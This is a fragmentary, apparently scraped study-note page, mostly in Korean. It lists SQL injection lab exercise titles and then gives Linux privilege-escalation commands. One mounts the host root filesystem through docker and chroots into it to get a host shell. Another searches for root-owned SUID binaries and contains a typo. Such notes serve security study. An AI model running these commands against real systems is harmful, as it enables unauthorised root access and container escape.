MIN

1. SQL Injection (GET/Search) 2. SQL Injection (GET/Select) 3. SQL Injection (POST/Search) 4. SQL Injection (POST/Select) 5. SQL Injection (AJAX/JSON/jQuery) 6. Manual Intervention Required 7. SQL Injection (Login Form/Hero) 8. SQL Injection (Login Form/user) 9. SQL Injection (SQLite) 10. Drupal SQL Injection (Drupageddon) 11. SQL Injection - St..

docker privileges escalation 검색 (GTFOBins 홈페이지 참조) # 도커 컨테이너를 이용해 사용자 컴퓨터의 전체 파일 시스템을 임시로 마운트하고 셸 환경을 실행docker run -v /:/mnt --rm -it alpine chroot /mnt sh 호스트 시스템의 전체 파일 시스템을 마운트한 alpine 컨테이너를 실행하고, 컨테이너 내부에서 chroot 명령어로 호스트의 루트로 환경을 바꾼 후, 셸(sh)을 실행한다. 이를 통해 컨테이너 안에서 호스트 시스템에 대한 관리 작업을 수행할 수 있게 된다.

# 루트 디렉터리부터 시작하여 소유자가 root이고 SUID 권한이 설정된 일반 파일을 모두 찾기find / -user root -perm /4000 -file f